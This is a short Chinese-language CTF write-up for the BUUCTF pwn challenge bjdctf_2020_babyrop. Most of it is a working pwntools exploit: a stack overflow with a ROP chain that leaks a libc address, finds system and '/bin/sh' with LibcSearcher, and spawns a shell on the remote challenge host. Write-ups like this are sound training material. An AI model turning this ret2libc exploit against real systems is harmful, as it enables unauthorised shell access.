[BUUCTF-pwn]——bjdctf_2020_babyrop
还是先checksec 一下
在IDA中看看
利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串.
因为64位,所以找下pop指令
思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
exploit
from pwn import *
from LibcSearcher import *
#p = process("./bjdctf_2020_babyrop")
p = remote('node3.buuoj.cn',27183)
elf = ELF("./bjdctf_2020_babyrop")
context.log_level = 'debug'
read_plt = elf.plt['read']
read_got = elf.got['read'] #当然你们也可以泄露puts函数的地址都可以
puts_plt = elf.plt['puts']
pop_rdi = 0x0400733
main_addr = 0x04006AD
payload = 'a'*(0x20 + 0x8) + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter("Pull up your sword and tell me u story!\n",payload)
read_addr = u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
print hex(read_addr)
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read")
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload = payload = 'a'*(0x20 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(sys_addr)
p.sendlineafter("Pull up your sword and tell me u story!\n",payload)
p.interactive()